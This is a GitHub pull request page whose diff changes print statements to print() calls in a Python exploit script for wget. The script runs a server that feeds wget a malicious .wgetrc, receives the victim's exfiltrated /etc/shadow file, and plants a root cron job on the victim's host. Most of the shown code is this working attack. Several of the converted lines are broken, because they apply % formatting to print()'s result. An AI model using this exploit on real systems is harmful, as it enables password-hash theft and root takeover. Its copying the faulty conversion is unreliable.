Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

changed from print "str" to print("str") #1

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

changed from print "str" to print("str") #1

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
22 changes: 11 additions & 11 deletions Wget/wget-exploit.py
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -18,7 +18,7 @@ class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# This takes care of sending .wgetrc

print "We have a volunteer requesting " + self.path + " by GET :)\n"
print("We have a volunteer requesting " + self.path + " by GET :)\n")
if "Wget" not in self.headers.getheader('User-Agent'):
print "But it's not a Wget :( \n"
self.send_response(200)
Expand All @@ -36,26 +36,26 @@ def do_GET(self):
def do_POST(self):
# In here we will receive extracted file and install a PoC cronjob

print "We have a volunteer requesting " + self.path + " by POST :)\n"
print("We have a volunteer requesting " + self.path + " by POST :)\n")
if "Wget" not in self.headers.getheader('User-Agent'):
print "But it's not a Wget :( \n"
print("But it's not a Wget :( \n")
self.send_response(200)
self.end_headers()
self.wfile.write("Nothing to see here...")
return

content_len = int(self.headers.getheader('content-length', 0))
post_body = self.rfile.read(content_len)
print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)
print("Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n") % (post_body)

print "Sending back a cronjob script as a thank-you for the file..."
print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
print("Sending back a cronjob script as a thank-you for the file...")
print("It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)")
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(ROOT_CRON)

print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"
print("\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n")

return

Expand All @@ -68,16 +68,16 @@ def do_POST(self):

handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)

print "Ready? Is your FTP server running?"
print("Ready? Is your FTP server running?")

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
print("FTP found open on %s:%s. Let's go then\n") % (FTP_HOST, FTP_PORT)
else:
print "FTP is down :( Exiting."
print("FTP is down :( Exiting.")
exit(1)

print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT
print("Serving wget exploit on port %s...\n\n") % HTTP_LISTEN_PORT

handler.serve_forever()